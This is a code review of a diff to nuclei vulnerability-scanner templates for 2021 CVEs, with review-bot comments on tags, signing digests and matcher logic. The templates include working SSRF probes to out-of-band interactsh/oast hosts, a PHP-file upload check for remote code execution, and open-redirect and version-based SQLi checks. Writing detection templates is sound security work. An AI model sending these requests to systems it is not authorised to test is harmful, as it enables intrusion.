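Review bot: This hunk moves the template from the current `http:` protocol key back to the legacy `requests:` key while other templates in the same commit (CVE-2021-22911, CVE-2021-24150, CVE-2021-24165) migrate in the opposite direction, so the repository ends up mixing both forms. It also turns `verified: true` into the string `"true"`, drops `cpe`, `vendor`, `product`, `max-request`, `epss-*`, `impact` and `remediation`, and the following hunk deletes the `# digest:` trailer, which — if the repository relies on template signing — leaves this template unsigned. These together look like an accidental revert to an older revision rather than a refresh; I would keep the removed lines and only apply the intended `name`/`description` wording. The matchers list continues past the end of this hunk.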
@@ -45,13 +30,10 @@ http: - "Ping |dir" - "bottom.php" condition: and - - type: word part: header words: - "text/html" - - type: status status: - 200 -# digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-21816.yaml b/nuclei-templates/CVE-2021/CVE-2021-21816.yaml deleted file mode 100644 index 38a9e71a82..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21816.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2021-21816 -info: - name: D-Link DIR-3040 - Syslog Information Disclosure - author: gy741 - severity: medium - description: An information disclosure vulnerability exists in the Syslog functionality of D-Link DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability. - reference: - - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N - cvss-score: 4.3 - cve-id: CVE-2021-21816 - cwe-id: CWE-922 - tags: cve,cve2021,dlink,exposure,router,syslog -requests: - - method: GET - path: - - "{{BaseURL}}/messages" - matchers-condition: and - matchers: - - type: word - words: - - "syslog:" - - "admin" - - "/etc_ro/lighttpd/www" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-21975.yaml b/nuclei-templates/CVE-2021/CVE-2021-21975.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21975.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21975.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-22054.yaml b/nuclei-templates/CVE-2021/CVE-2021-22054.yaml index 0de7ce4ee8..1599beb9ec 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-22054.yaml 
+++ b/nuclei-templates/CVE-2021/CVE-2021-22054.yaml @@ -1,13 +1,13 @@ id: CVE-2021-22054 info: - name: VMWare Workspace One UEM SSRF + name: VMWare Workspace ONE UEM - Server-Side Request Forgery author: h1ei1 severity: high - description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain an SSRF vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information. + description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information. reference: - https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-22054 - https://www.vmware.com/security/advisories/VMSA-2021-0029.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-22054 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -22,9 +22,11 @@ requests: - "{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A" matchers-condition: and matchers: + - type: word + words: + - "Interactsh Server" - type: status status: - 200 - - type: word - words: - - "Example Domain" + +# Enhanced by mp on 2022/06/27 diff --git a/nuclei-templates/CVE-2021/CVE-2021-22214.yaml b/nuclei-templates/CVE-2021/CVE-2021-22214.yaml deleted file mode 100644 index d374690bcd..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-22214.yaml +++ /dev/null 
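Review bot: The second hunk changes the expected response body from `Example Domain` to `Interactsh Server` while the `Url=` parameter it depends on is an unchanged context line holding an opaque encoded value, so the diff gives no way to confirm that the encoded target now resolves to an Interactsh host; if it does not, the matcher silently never fires, and if it does, the verdict depends on a third-party public service being up. Please add a comment above the request stating what host the encoded `Url` value resolves to and why a fixed value is used, e.g. `# Url= is an encoded value expected to resolve to <host placeholder>; matcher below checks that host's default body`. The hunk also appends an `# Enhanced by` trailer, whereas the rest of this commit replaces such trailers with `# digest:` lines.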
@@ -1,27 +0,0 @@ -id: CVE-2021-22214 -info: - author: Suman_Kar - name: Unauthenticated Gitlab SSRF - CI Lint API - severity: medium - description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited. - reference: | - - https://nvd.nist.gov/vuln/detail/CVE-2021-22214 - - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - - https://docs.gitlab.com/ee/api/lint.html - tags: cve,cve2021,gitlab,ssrf,oob -requests: - - raw: - - | - POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 - Referer: {{BaseURL}} - content-type: application/json - Connection: close - - {"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"} - matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2021/CVE-2021-22707.yaml b/nuclei-templates/CVE-2021/CVE-2021-22707.yaml index 408202e788..843d4a9253 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-22707.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-22707.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22707 cwe-id: CWE-798 - epss-score: 0.39636 - epss-percentile: 0.96894 + epss-score: 0.27092 + epss-percentile: 0.96671 cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: product: evlink_city_evc1s22p4_firmware shodan-query: title:"EVSE web interface" fofa-query: title="EVSE web interface" - tags: cve,cve2021,evlink,auth-bypass + tags: cve2021,cve,evlink,auth-bypass,schneider-electric http: - raw: 
@@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022066a9645324b156c9dd069e3a3a087fc69e0744524b96a5570f16e55c077b697b02210080b17fdace0414a4bceb62ee371881cf66e409c216c91c17d60c83c442fad546:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c2ddc524c81bab04c11b51b6377bb61707042a4f1c9007e4d4fc8dd4b9c415ba022100df0afe79fce39ccb1592f7893da9933c9b1a645a95fa1e6be05a57e53c2b67aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-22911.yaml b/nuclei-templates/CVE-2021/CVE-2021-22911.yaml index fa55be1229..8ae52aa88f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-22911.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-22911.yaml @@ -5,6 +5,10 @@ info: author: tess,sullo severity: critical description: Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary NoSQL queries, leading to unauthorized access, data manipulation, or denial of service. + remediation: | + Upgrade Rocket.Chat to a version higher than 3.13 or apply the provided patch to mitigate the vulnerability. reference: - http://packetstormsecurity.com/files/162997/Rocket.Chat-3.12.1-NoSQL-Injection-Code-Execution.html - https://github.com/vulhub/vulhub/tree/master/rocketchat/CVE-2021-22911 
@@ -16,13 +20,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-22911 - cwe-id: CWE-89 + cwe-id: CWE-75,NVD-CWE-Other + epss-score: 0.94773 + epss-percentile: 0.99209 + cpe: cpe:2.3:a:rocket.chat:rocket.chat:3.11.0:-:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: rocket.chat + product: rocket.chat shodan-query: http.title:"Rocket.Chat" - verified: "true" - tags: rocketchat,nosqli,packetstorm,vulhub,hackerone,cve,cve2021 + tags: cve2021,cve,rocketchat,nosqli,packetstorm,vulhub,hackerone,rocket.chat,sqli -requests: +http: - raw: - |- POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1 @@ -48,5 +58,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/10/12 +# digest: 4a0a0047304502202ceec4399b237de979a8a362eb44fad120bd7bb964bb3fcdbb6d6a01e6557c52022100894d28662f6e764af7d0e5fca1e84474779041d8ac3df6fa020f407efa627421:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24145.yaml b/nuclei-templates/CVE-2021/CVE-2021-24145.yaml index 379ae4801a..faae9c575d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24145.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24145.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution. + impact: | + Remote code execution remediation: Fixed in version 5.16.5. reference: - https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610 
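Review bot: The new `tags` line adds `sqli` to a template that already carries `nosqli` and whose description is a NoSQL injection, so `-tags sqli` runs would start pulling in a non-SQL check; unless the taxonomy is deliberately merged, keep `tags: cve2021,cve,rocketchat,nosqli,packetstorm,vulhub,hackerone,rocket.chat`. In the same hunk `cwe-id` goes from `CWE-89` to `CWE-75,NVD-CWE-Other`; I cannot verify either value from the diff, so it should be cross-checked against the NVD record before merge. The `requests:` → `http:` migration and `verified: true` change are consistent with the rest of the commit.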
@@ -17,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24145 cwe-id: CWE-434 - epss-score: 0.93725 - epss-percentile: 0.98894 + epss-score: 0.94936 + epss-percentile: 0.99118 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,10 @@ info: vendor: webnus product: modern_events_calendar_lite framework: wordpress - tags: auth,wpscan,cve,wordpress,wp-plugin,wp,modern-events-calendar-lite,cve2021,rce,intrusive + tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus + +variables: + string: "CVE-2021-24145" http: - raw: @@ -46,7 +51,7 @@ http: Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php" Content-Type: text/csv - + -----------------------------132370916641787807752589698875 Content-Disposition: form-data; name="mec-ix-action" @@ -59,10 +64,8 @@ http: matchers-condition: and matchers: - - type: dsl - dsl: - - contains(header_3, "text/html") - - status_code_3 == 200 - - contains(body_3, 'CVE-2021-24145') - condition: and -# digest: 4b0a00483046022100d63a9f610fac887aa79576d6d9c737ab89ba2dd43219f9605c5aecf00d58f879022100f112299483a18228eaf5e63b078bb7ed1074b1c0bd00aaf880b18d7782b2f3b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: word + part: body_3 + words: + - '{{md5(string)}}' +# digest: 4a0a00473045022100eb908dd55285a9d68012b0deb023c829756d657d18a89b83a500e349b9414fdc0220797b8bd8acbf0f11d56926e26306dcaaf73faad50e06780881b5dcea9c5251ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24150.yaml b/nuclei-templates/CVE-2021/CVE-2021-24150.yaml index b6f80444ac..af83e84061 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24150.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24150.yaml 
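Review bot: The last hunk replaces the dsl matcher (status 200, text/html, literal `CVE-2021-24145` in body_3) with a single word matcher on `{{md5(string)}}`, which only works if the uploaded file body — outside this hunk — was changed in step to print that hash; please confirm the payload and matcher were updated together. Dropping the status check also means a non-200 page that happens to echo the hash would now match; with `matchers-condition: and` already present, a second matcher `- type: status` / `status:` / `- 200` keeps that guard at no cost. The `variables:` block introduced earlier in this file (`string: "CVE-2021-24145"`) is what the new matcher hashes, so the two hunks must land together.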
@@ -1,11 +1,15 @@ id: CVE-2021-24150 info: - name: Like Button Rating < 2.6.32 - Unauthenticated Full-Read SSRF + name: WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery author: theamanrawat severity: high description: | - The LikeBtn WordPress plugin was vulnerable to Unauthenticated Full-Read Server-Side Request Forgery (SSRF). + WordPress Like Button Rating plugin before 2.6.32 is susceptible to server-side request forgery. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure. + remediation: | + Update the WordPress Like Button Rating plugin to version 2.6.32 or later. reference: - https://wpscan.com/vulnerability/6bc6023f-a5e7-4665-896c-95afa5b638fb - https://wordpress.org/plugins/likebtn-like-button/ @@ -15,15 +19,22 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24150 cwe-id: CWE-918 + epss-score: 0.02268 + epss-percentile: 0.88473 + cpe: cpe:2.3:a:likebtn-like-button_project:likebtn-like-button:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,cve2021,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button + verified: true + max-request: 1 + vendor: likebtn-like-button_project + product: likebtn-like-button + framework: wordpress + tags: cve2021,cve,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button,likebtn-like-button_project -requests: +http: - raw: - | @timeout: 10s - GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.interact.sh')}}" HTTP/1.1 + GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}" HTTP/1.1 Host: {{Hostname}} matchers-condition: and 
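Review bot: The request still embeds a fixed public OAST hostname (`likebtn.com.oast.me`, previously `likebtn.com.interact.sh`) rather than the per-scan `{{interactsh-url}}`, so the verdict depends on a shared third-party server answering and cannot be correlated to this scan; the matchers that consume the response are outside this hunk. If the fixed host is required by the plugin's own handling of the parameter, say so in a comment above the raw request, e.g. `# fixed host used deliberately; result depends on the public OAST server responding`, so the next maintainer does not swap it for `{{interactsh-url}}` and silently break the check. The `verified: true`, `max-request: 1` and `http:` changes are consistent with the rest of the commit.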
@@ -36,3 +47,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502200ae092b2adea843bbfc67e272e1bbcdda95f6b1ba06ecb35d0f8be5f3de1461b0221009750e56702e2ad63ef146d19101a646b2f66d94372d7809750db43ee23d5a703:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24155.yaml b/nuclei-templates/CVE-2021/CVE-2021-24155.yaml index 52750a3368..244295f61e 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24155.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24155.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Backup Guard plugin before 1.6.0 is susceptible to authenticated arbitrary file upload. The plugin does not ensure that imported files are in SGBP format and extension, allowing high-privilege users to upload arbitrary files, including PHP, possibly leading to remote code execution. + impact: | + Remote code execution remediation: Fixed in version 1.6.0. reference: - https://wpscan.com/vulnerability/d442acac-4394-45e4-b6bb-adf4a40960fb @@ -17,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24155 cwe-id: CWE-434 - epss-score: 0.95369 - epss-percentile: 0.99171 + epss-score: 0.95488 + epss-percentile: 0.99234 cpe: cpe:2.3:a:backup-guard:backup_guard:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: backup-guard product: backup_guard framework: wordpress - tags: authenticated,wp,packetstorm,wp-plugin,cve2021,rce,wordpress,cve,backup,wpscan,intrusive + tags: cve,cve2021,authenticated,wp,packetstorm,wp-plugin,rce,wordpress,backup,wpscan,intrusive,backup-guard http: - raw: 
@@ -77,4 +79,4 @@ http: regex: - BG_BACKUP_STRINGS = {"nonce":"([0-9a-zA-Z]+)"}; internal: true -# digest: 4a0a00473045022100b061ce9bdab2853c68100723d19fc954a5fd56188a44816e8bfcbe57f63f6cc5022005b23d5f9b10ac34ee06b2bec16904eb42e917ced05c5959b241e6149f5ebf82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b8c26489e388600ed7392126a0d96153b15b0ad02bfc879d7e47473dcb14fa9e022041508bc27c2a5f188b6cd39a606c2be97099960ee8d30c9ddb535a3a22f9a31c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24165.yaml b/nuclei-templates/CVE-2021/CVE-2021-24165.yaml index b80bf03591..cffac4b43f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24165.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24165.yaml 
@@ -6,18 +6,32 @@ info: severity: medium description: | WordPress Ninja Forms plugin before 3.4.34 contains an open redirect vulnerability via the wp_ajax_nf_oauth_connect AJAX action, due to the use of a user-supplied redirect parameter and no protection in place. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. + remediation: | + Update to the latest version of the Ninja Forms plugin (3.4.34 or higher) to fix the open redirect vulnerability. reference: - https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818 - https://www.wordfence.com/blog/2021/02/one-million-sites-affected-four-severe-vulnerabilities-patched-in-ninja-forms/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24165 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24165 cwe-id: CWE-601 - tags: cve,cve2021,wordpress,redirect,wp-plugin,authenticated,wp,wpscan + epss-score: 0.00129 + epss-percentile: 0.46774 + cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: ninjaforms + product: ninja_forms + framework: wordpress + tags: cve2021,cve,wordpress,redirect,wp-plugin,authenticated,wp,wpscan,ninjaforms -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 
@@ -27,19 +41,15 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1 Host: {{Hostname}} - req-condition: true - cookie-reuse: true matchers: - type: dsl dsl: - 'status_code_1 == 302' - 'status_code_2 == 302' - - "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')" + - "contains(header_2, 'Location: https://interact.sh?client_id=1')" condition: and - -# Enhanced by md on 2022/10/14 +# digest: 4a0a00473045022100af649c1abdb63fdedcc1e46e68a77c520ee591eac3e400bbaa84654855512c8902200eb0a2419a23469cfae750f62bd2f38b597658927a13e0dc3aabafb3c49025dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24169.yaml b/nuclei-templates/CVE-2021/CVE-2021-24169.yaml index 5f21e39583..c9b9181338 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24169.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24169.yaml 
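Review bot: Removing `cookie-reuse: true` makes the second request's dependence on the login session from the first request implicit; as far as I know cookie reuse is the default in nuclei v3, so this is fine only if the repository has dropped support for older engines, and a short comment above the GET (`# relies on v3 default cookie reuse for the wp-login session`) would make that assumption visible. The `all_headers_2` → `header_2` rename in the dsl matcher is consistent with the `matchers` syntax used elsewhere in this commit. The trailing `# Enhanced by` line is replaced with a `# digest:` line, matching the other updated templates.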
@@ -6,19 +6,22 @@ info: severity: medium description: | WordPress Advanced Order Export For WooCommerce plugin before 3.1.8 contains an authenticated cross-site scripting vulnerability via the tab parameter in the admin panel. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Authenticated users can execute arbitrary scripts on the affected WordPress site, leading to potential data theft, defacement, or further compromise. remediation: Fixed in version 3.1.8. reference: - https://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3 - https://www.exploit-db.com/exploits/50324 - https://wordpress.org/plugins/woo-order-export-lite/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24169 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24169 cwe-id: CWE-79 - epss-score: 0.00183 - epss-percentile: 0.55492 + epss-score: 0.0021 + epss-percentile: 0.58287 cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: algolplus product: advanced_order_export framework: wordpress - tags: wordpress,authenticated,wpscan,cve,cve2021,xss,wp-plugin,wp,woo-order-export-lite,edb + tags: cve2021,cve,wordpress,authenticated,wpscan,xss,wp-plugin,wp,woo-order-export-lite,edb,algolplus http: - raw: 
@@ -47,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "woo-order-export-lite")' condition: and -# digest: 4b0a004830460221008900c2bcb41afb7cb8760d8fc0b17d9d2737ac702767ca98b531dc6f0aeedeb5022100e48fda55a787c3275448413db005fa0c2561f4412ceebd41a63ce328c366add8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009d6516913d6729de70ed63ad691d2279e02dccb63785273ce41ad95627d09b600221008c2ad831a4ea154a285ac6cc8782e79d2963279dd7368f98298158f17ca2bedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24182.yaml b/nuclei-templates/CVE-2021/CVE-2021-24182.yaml index 81d5860713..5c0a727f61 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24182.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24182.yaml 
@@ -1,31 +1,46 @@ id: CVE-2021-24182 info: - name: Tutor LMS < 1.8.3 - SQL Injection via tutor_quiz_builder_get_answers_by_question - author: akincibor - severity: critical - description: The tutor_quiz_builder_get_answers_by_question AJAX action from the plugin was vulnerable to UNION based SQL injection that could be exploited by students. + name: > + Tutor LMS <=1.8.2 - SQL Injection via tutor_quiz_builder_get_answers_by_question + author: topscoder + severity: high + description: > + The tutor_quiz_builder_get_answers_by_question AJAX action from the Tutor LMS – eLearning and online course solution WordPress plugin before 1.8.3 was vulnerable to UNION based SQL injection that could be exploited by students. reference: - - https://wpscan.com/vulnerability/f74dfc52-46ba-41e3-994b-23115a22984f - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6489214-2155-47f4-83ef-0119b3c26e43?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-24182 + metadata: + fofa-query: "wp-content/plugins/tutor/" + google-query: inurl:"/wp-content/plugins/tutor/" + shodan-query: 'vuln:CVE-2021-24182' + tags: cve,wordpress,wp-plugin,tutor,high -requests: +http: - method: GET + redirects: true + max-redirects: 3 path: - - '{{BaseURL}}/wp-content/plugins/tutor/readme.txt' + - "{{BaseURL}}/wp-content/plugins/tutor/readme.txt" extractors: - type: regex name: version - internal: true + part: body group: 1 + internal: true regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" - type: regex + name: version + part: body group: 1 regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" matchers-condition: and matchers: 
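Review bot: The new `tags` line drops `cve2021`, `sqli` and `unauth` and adds `high`, which breaks the `cve,cveYYYY` convention every other CVE template in this commit follows (a `-tags cve2021` run would miss this template) and duplicates the `severity` field as a tag; `tags: cve,cve2021,wordpress,wp-plugin,tutor,sqli` keeps it selectable. The hunk also declares two extractors both named `version` — one `internal: true` and one exported — with identical regexes, so the second is redundant and shadows the first for the `compare_versions(version, ...)` dsl; keep one extractor and drop `internal: true` if the value should be reported. Finally the hunk changes `author` and lowers `severity` from `critical` to `high` while adding `cvss-score: 8.8`; if that is a deliberate re-scoring it should be stated in the commit description rather than left implicit. The matchers list continues in the next hunk.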
@@ -35,9 +50,9 @@ requests: - type: word words: - - "Tutor LMS" + - "tutor" part: body - type: dsl dsl: - - compare_versions(version, '< 1.8.3') \ No newline at end of file + - compare_versions(version, '<= 1.8.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24214.yaml b/nuclei-templates/CVE-2021/CVE-2021-24214.yaml index cf5a0ecabd..4595b089bc 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24214.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24214.yaml 
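Review bot: Replacing the body word `Tutor LMS` with `tutor` weakens the plugin-presence check, since the lowercase word can appear in unrelated readme or error pages and the word matcher is case-sensitive, so the original product string no longer matches a readme that only contains `Tutor LMS`. Keep the original `- "Tutor LMS"`, or add `case-insensitive: true` if the intent was to tolerate casing differences. The version bound change to `compare_versions(version, '<= 1.8.2')` is equivalent to the old `< 1.8.3` for dotted versions and needs no change.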
@@ -1,23 +1,50 @@ id: CVE-2021-24214 + info: name: WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting author: tess severity: medium description: WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update to the latest version of the WordPress OpenID Connect Generic Client plugin (3.8.2) to fix this vulnerability. reference: - https://wpscan.com/vulnerability/31cf0dfb-4025-4898-a5f4-fc7115565a10 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24214 - https://nvd.nist.gov/vuln/detail/CVE-2021-24214 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24214 cwe-id: CWE-79 + epss-score: 0.00337 + epss-percentile: 0.7074 + cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:* metadata: verified: true - tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,wp,openid + max-request: 1 + vendor: daggerhartlab + product: openid_connect_generic_client + framework: wordpress + tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,wp,openid,daggerhartlab + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'OpenID Connect Generic Client' -requests: - method: GET path: - '{{BaseURL}}/wp-login.php?login-error=' 
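Review bot: The hunk adds `flow: http(1) && http(2)` and a second HTTP request (the readme.txt probe) but sets `max-request: 1` in the new `metadata` block, so the declared request budget is stale; it should read `max-request: 2`. The readme probe is a sensible pre-check and its word matcher is correctly marked `internal: true` so it does not surface as a finding on its own. The second request keeps the `- method: GET` form under `http:`, which is valid but mixes styles with the `raw` first request; converting it to the same `raw` form would make the two steps read uniformly. The second request's matchers continue past this hunk.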
